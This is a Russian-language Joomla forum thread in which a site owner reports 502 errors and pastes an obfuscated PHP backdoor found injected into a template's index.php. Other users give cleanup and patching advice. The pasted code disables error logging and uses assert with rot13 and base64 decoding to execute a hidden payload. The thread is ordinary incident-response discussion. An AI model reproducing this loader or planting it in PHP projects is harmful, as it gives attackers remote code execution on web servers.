Форум русской поддержки Joomla!® CMS
10.12.2016, 14:50:30 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

502 Bad Gateway nginx/1.10.0 (Ubuntu)

 (Прочитано 306 раз)
0 Пользователей и 1 Гость смотрят эту тему.
xander kej
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 233


Keep working


« : 09.10.2016, 13:50:22 »

Добрый день
На трёх сайтах появились ошибки - 502 Bad Gateway nginx/1.10.0 (Ubuntu) - в тегах center
Например тут -
Показать текстовый блок
Версия Joomla - 1.5.25.
Обновление на 28 версию руками - даёт вообще дохлый сайт с 500 ошибкой
Похоже на инъекцию, в index.php файле тема - появился вот такой код:
Код:
<?php
//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8iMz9lq2SlMP1cozEyrP5lqF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqXF4vWzD9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVznG0kWzt9Vv5gMQHbVwV4MGWvBQWvBQt5Lwp5ZQZ5MQywAJRjMwyvBTMvBQR0ZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1OCH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1OCH1EoVaNvKFxcVQ09VPV1MzV3ZQAyAwNmZGp2MGMxAQxkAwL5LJR5BGV5ZmL2MPVcVUftDTI2LJjbp3ElnKOmoTSmnTImXPEsHR9GISfvLlWqXFx7VU0XMJAbolNxnJW2Bjc9VU0="));'); $strings($light);
//###=CACHE END=###
?>

Но его удаление не даёт никакого результата

Помогите разобраться
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #1 : 09.10.2016, 14:06:10 »

Чистить сайт нужно. Ну а поскольку Версия Joomla - 1.5.25., то и патч от 14.12.2015 года не установлен.
Обновиться, вычистить, и установить патч .
Записан
xander kej
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 233


Keep working


« Ответ #2 : 09.10.2016, 14:31:36 »

Кароче почистил руками, обновил файлы, патч, вроде помогло  drink
« Последнее редактирование: 09.10.2016, 16:30:16 от xander kej » Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2289



« Ответ #3 : 09.10.2016, 20:07:34 »

Кароче почистил руками, обновил файлы, патч, вроде помогло  
Скоро опять помрет. draff же сказал - чистить и обновлять, ставить патчи... Вы удалили вредонос (даже не стал расшифровывать, что там у вас в последних трех строчках), но как он попал к вам, этот код? Значит где то сидит шелл, бекдор и т.д. Дверь осталась открытой. Следовательно, новый взлом долго себя ждать не заставит.
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #4 : 09.10.2016, 20:22:59 »

Айболитом еще шеллы поищите
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet